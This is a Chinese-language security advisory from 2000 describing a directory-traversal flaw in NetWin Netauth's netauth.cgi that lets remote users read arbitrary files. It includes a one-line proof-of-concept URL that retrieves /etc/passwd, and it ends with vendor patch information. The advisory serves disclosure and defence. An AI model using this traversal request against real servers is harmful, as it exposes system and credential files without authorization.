安全研究
安全漏洞
Netwin Netauth 泄漏系统文件内容漏洞
发布日期:2000-08-21
更新日期:2000-08-21
受影响系统:
NetWin Netauth 4.2以及更低版本
描述:
Netwin 的Netauth软件是一个基于web的邮件管理系统。它应用在Windows NT和大部分的Unix
品台上。它提供的一个cgi程序:netauth.cgi存在一个安全问题,允许远程用户读取web主机上
任何已知文件。
<* 来源:Marc Maiffret (
marc@eeye.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
建议:
Netwin已经发布了Netauth 4.2f,这个版本解决了这个问题,下载地址:
http://netwinsite.com/netauth/download.htm
浏览次数:5919
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |